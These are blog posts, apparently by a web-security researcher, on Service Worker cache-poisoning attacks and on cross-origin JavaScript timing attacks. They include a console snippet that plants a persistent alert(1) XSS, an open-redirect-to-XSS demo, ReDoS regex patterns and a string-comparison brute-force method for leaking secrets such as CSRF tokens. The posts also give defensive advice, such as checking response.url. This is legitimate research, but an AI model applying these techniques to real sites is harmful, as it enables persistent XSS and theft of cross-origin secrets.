  • Appreciation, Recognition and Transparency (ART) are the pillars of a well ran security response program.
  • If you find yourself buried in low quality reports, invest some time to help them. Ignoring the problem won't make it go away.
  • Invest as much time as possible knowing about your community. Meet them face to face, invite them for dinner! Bug hunters are and will always be your most valuable users (including those that just started learning).


Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my  last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
Poison Cache

Image URL:



When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
If all went well, the page above should be "poisoned", and forever (or until the SW updates it's cache) you will get the XSS payload. Try it (note that you must have first "poisoned" the response above, if you click the button below here before poisoning the cache first, you will ruin the demo for ever since an opaque response will get cached ;):
If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, to clear the cache.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++


Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (and this year it was Service Workers). The presentation went OK and it was super fun to meet up with so many people, and watch all those great presentations.

In any case, I promised to write a blog post to repeat the presentation but in a written form, however I was hoping to watch the video to see what mistakes I might have made and correct them in the blog post, and the video is not online yet. Anyway, so, until then, today this post is about something that wasn't mentioned in the talk.

This is about what type of vulnerabilities applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! It's APIs are easy to use and understand and the debugging tools in Chrome are beautiful and well done (very important since tools such as Burp or TamperChrome wouldn't work as well with offline apps as no requests are actually done.) You can clearly see that a lot of people have thought a lot about this problem, and there is some serious effort around making offline application development possible.

The reason this blog post content wasn't part of the presentation is because I thought it already had too much content, but if you don't know how Service Workers work, you might want to see the first section of the slides (as it's an introduction) or you can read this article or this video.

Anyway, so back to biz.. Given that there aren't many "real" web applications using Service Workers, I'll be using the service-worker samples from the w3c-webmob, but as soon as you start finding real service worker usage take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. Web JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, that is probably kind-of bad, is the possibility of making a reflected XSS into a persistent XSS. We've already seen this type of problems based on APIs like localStorage before, but what makes this difference is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. The service worker at this point can decide to respond with a cache response (it's logic is totally delegated to the Service Worker). One of the main use-cases for service workers is to serve a cached-up copy of the request. This cache is programmatic and totally up-to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache, if available or, to make a request if not (and cache the response). In other words, in those cases, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever it wants, and let the client serve the malicious XSS for ever!

If you want to try this out, go here:

Then fake an XSS by typing this to the console:
caches.open('prefetch-cache-v1').then(function(cache){cache.put(new Request('index.html', {mode: 'no-cors'}), new Response('\x3cscript>alert(1)\x3c/script>', {headers: {'content-type': 'text/html'}}))})

Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to undo it, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS. You have to manually delete the cache :(.

This is likely to be an anti-pattern we'll see in new Service-Workers enabled applications often. To prevent this, one of the ideas from Jake Archibald is to simply check the "url" property of the response. If the URL is not the same as the request, then simply not use it, and discard it from the cache. This idea is quite important actually, and I'll explain why below.

When Secure Open Redirects become XSS

A couple years ago in a presentation with thornmaker we explained how open redirects can result in XSS and information leaks, and they were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and in specific some of the ways that the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding over the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it from the same origin it was loaded from.

In other words.. let's say you have a website that has an open redirect..
  • https://www.example.com/logout?next=https://www.othersite.com/
And you have a service worker like this one:
  • https://googlechrome.github.io/samples/service-worker/read-through-caching/service-worker.js
What that service worker does, as the previous one, is simply cache all requests that go through by refetching and the service worker will cache the response from evilwebsite.com for the other request!

That means that next time the user goes to:
  • https://www.example.com/logout?next=https://www.evilwebsite.com
The request will be cached and instead of getting a 302 redirect, they will get the contents of evilwebsite.com.

Note that for this to work, evilwebsite.com must include Access-Control-Allow-Origin: * as a response header, as otherwise the request won't be accepted. And you need to make the request be cors enabled (with a cross origin image, or embed request for example).

This means that an open redirect can be converted to a persistent XSS and is another reason why checking the url property of the Response is so important before rendering it (both from Cache and on code like event.respondWith(fetch(event.request))). Because even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers will be vulnerable to one or another variation of these types of attacks if they don't implement the response.url check.

There's a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk and that I'll try to blog about later. For now though, let's change subject.

Web JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good web APIs for building responses. What this means is that because Service Workers will now be kind-of like Web Servers, but are being put there without having any APIs for secure web development, then it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs


For starters, the default concerns are things that affect existing JS-based server applications (like Node.js). Things from RegExp bugs because the JS APIs aren't secure by default to things like the JSON API lack of encoding.

But another more interesting problem is that the lack of templating APIs in Service Workers means people will write code like this which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default library means people are just likely to use insecure alternatives or just default to string concatenation (note things like angular and handlebars won't work here, because they work at the DOM level and the Service Workers don't have access to the DOM as they run way before the DOM is created).

It's also worth noting that thanks to the asynchronous nature of Service Workers (event-driven and promise-based) mixed with developers that aren't used to this, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope, which while isn't the case today, is very likely to be the case soon.

Cross Site Request Forgery


Another concern is that CSRF protection will have to behave differently for Service Workers. In specific, Service Workers will most likely have to depend more on referrer/origin based checks. This isn't bad in and off itself, but mixing this with online web applications will most likely pose a challenge to web applications. Funnily, none of the demos I found online have CSRF protection, which remarks the problem, but also makes it hard for me to give you examples on why it's gonna be hard.

To give a specific example, if a web application is meant to work while offline, how would such application keep track of CSRF tokens? Once the user comes online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible by simply doing different checks depending on the online state of the application, it's likely more people will get it wrong than right.

Conclusion

I'm really excited to see what type of web applications are developed with Service Workers, and also about what type of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge as a result of the API design, or of the existing mental models on developers' heads.

Another thing I wanted to mention, before closing up is that I'll start experimenting writing some of the defense security tools I mentioned in the talk, if you want to help out as well, please let me know!

Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about wrapping overflow leak on frames, this one is also regarding the presentation Matryoshka that I gave in Hamburg during HackPra All Stars 2013 during Appsec Europe 2013.

The subject today is regarding web application timing attacks. The idea behind this attack is a couple of techniques on how to attack another website by using timing attacks. Timing attacks are very popular in cryptography, and usually focus on either remote services, or local applications. Recently, they've become a bit popular, and are being used to attack browser security features.


Today the subject I want to discuss is not attacking the browser, or the operating system, but rather, other websites. In specific, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.


The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript heavy applications that handle data somehow controlled by another website, such as cookies, the URL, referrer, postMessage, etc..


Overall though, the attack itself isn't new, and the application of the attack on browsers is probably predictable.. but when discussed it's frequently dismissed as unexploitable, or unrealistic. Now, before I get your hopes up, while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.


We know that you can obviously know if your own code runs faster or slower, but, as some of you might want to correct me.. that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that https://puppies.com cant interact with https://kittens.com. It defines a very specific subset of APIs where communication is safe (like, say, navigation, or postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks, you need to opt-in to be vulnerable to them. That is, you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        e.source.postMessage('got a match!', e.source);
    }
}

Well, of course it will be possible to leak information.. try it out here:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9
Regexp:


You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
    e.source.postMessage('finished', e.source);
}

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability (or.. not).

Now, it clearly is vulnerable, but let's figure out exactly why. There is one piece of information that is leaked, and that is, how long it took to run the regular expression. We control the regular expression, so we get to run any regular expression and we will get to learn how long it took to run.

If you are familiar with regular expressions, you might be familiar with the term "ReDoS", which is a family of regular expressions that perform a Denial of Service attack on the runtime because they run in exponential time. You can read more about it here. Well, the general premise is that you can make a regular expression take for-ever if you want to.

So, with that information, we can do the same attack as before, but this time, we will infer if we had the right match simply by checking if it took over N seconds to respond to our message, or well... if it returned immediately.

Let's give it a try:


  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX
Regexp:



Did you notice that the right answer took longer than the others?

If you are an average security curmudgeon you will still say that the fault is at the vulnerable site, since it's opting-in to leak how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
}

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates kittens.com from puppies.com I wasn't being totally honest. The JavaScript code from both, kittens.com and puppies.com run in the same thread. That is, if you have 3 iframes one pointing to puppies.com, one pointing to kittens.com and one pointing to snakes.com then all of them run in the same thread.

Said in another way, if snakes.com suddenly decides to run into an infinite loop, neither puppies.com nor kittens.com will be able to run in any JavaScript code. Don't believe me? Give it a try!




.

Did you notice that when you looped the "snakes" the counters in the other two iframes stopped? That's because both, the snakes and the puppies and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens upon us. Now, we don't need the other page surrender any information to us. Simply by running in the same thread we do, we can guess how long their code takes to run!

One way to attack this is by simply asking the browser to run a specific piece of code every millisecond, and whenever we don't run, that means there's some other code keeping the interpreter busy at the time. We keep track of these delays and we then learn how long the code took to run.

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content.. so this attack is kinda lame..

Well, not really. Fortunately there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me that he always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS, but then jQuery fixed it.. so no-more-XSS and if the code starts with a '#', then it is forced as a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it took for it to run a specific selector over the code. I told him that was a great idea, and started looking into it. Turns out, there is a "contains" selector in jQuery that will essentially look at all the text content in the page and try to figure out what nodes "contain" such text.

It essentially finds a node, and then serializes it's text contents, and then searches for such value inside it. In a nutshell it does:

haystack.indexOf(needle);

Which, is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out if there was a match is significantly more complicated.. We need to know if the "haystack" found something (or not) which sounds, well.. complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a running time difference, but the difference is so small we might not be able to measure it.

There is another, even cooler selector, the "string prefix" selector. Say, you have:

You can match it with:
input[name=csrftoken][value^=X]

But again, this is even more difficult than the indexOf() attack we were doing earlier.. The question now is can we detect string comparisons? Can we get enough accuracy out of performance.now() that we get to know if string comparisons succeed?

To make the question clearer.. can we measure in JavaScript the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right" because the runtime can stop the comparison on the first character, while to be sure that "right" is equal to "right", then it needs to compare every character in the string to ensure it's exactly the same.

This should be easy to test. In the following iframe we make a quick experiment and measure:

  • Time taken to compare "aaaa.....a" (200k) to "foobar"
  • Time taken to compare "aaaa.....a" to "aaaa.....a"
We make the comparison 100 times to make the timing difference more explicit.

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
This strangely looking results mean, mostly, that comparing a very long string takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is first, they try to take a shortcut. If the lengths are different, then they return false immediately. If they are the same, on the other hand, then they compare char-by-char. As soon as they find a character that doesn't match, it returns false.

But is it significant? And if so, how significant is it? To try and answer that question I ran several experiments. For instance, it's 2-10 times faster to make a "false" comparison, than a "true" comparison with just 18 characters. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need to be able to "stabilize" the comparison. What you should see in that graph is something like:

What that graph means is that after 120,000 iterations (that is 120,000 comparisons) the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx"  is stable and is 6 times slower. And, to be clear, that is 18 characters being different. This means that to be able to notice the 6X difference you would need to bruteforce the 18 characters at once. Even in the most optimistic scenarios, bruteforcing 18 characters is way out the question.

If you try to repeat the experiment with just 2 characters, the results are significantly different (note this graph rounds up results to the closest integer). You won't be able to notice any difference.. at all. The line is flat up to a million iterations. That means that comparing a million times "aa" vs "bb" runs in about the same amount of time (not as impressive as our 6X!).

But.. we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters the difference looks roughly like this:
Which.. means it usually runs in exactly the same time, sometimes a tiny bit faster, but also many times slightly slower. In essence, it seems to run at about 1.02 times the speed of a false comparison.

Now, the fact this graph looks so messy means our exploit won't be as reliable, and will require significantly more samples to detect any changes. We now have in our hands a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred or a couple thousand, or a couple million times (this actually depends on the machine, a slow machine has more measurable results, but also has more noise, a fast machine has less measurable results, but we can do more accurate measurements).

With the samples we either average the results, or get the mean of means (which needs a lot of samples) or a chi squared test if we knew the variance or a student t test if you can assume a normal distribution (JavaScript's garbarge collector skews things a bit).


At the end of the day, I ended up creating my own test, and was able to brute force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing
}

Here are some results on string comparison on Chrome:
  • It is possible to bruteforce an 18 digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform 5 quadrillion comparisons per second. With the timing attack you only need 1 million.
  • It is possible to reliably calculate a 9 character alphanumeric string in about 10 minutes.
    • This is different than the numbers because here we have 37 characters alphabet, and with numbers it's just 10.
If you are interested in playing around with it, and you have patience (a lot of patience!) check this and this. They will literally take 5-10 minutes to run, and it will simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience you can run this which will run different combinations of iterations/samples trying to figure out which works best (slow machines work better with less iterations and more samples, faster machines run best with more iterations and less samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadness. That might change with things like process isolation, but it will continue to be possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for a 18 digit number you are my hero!), find a problem in the sampling/data, or otherwise are able to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing is that strings from different origins are both stored in the same hash table. This means that if we were able to measure a hashtable miss from a hashtable match, we could read strings cross-origin.

I spent a lot of time trying to make that to work, but it didn't work out. If you can do it, let me know as well :)

Thanks for reading!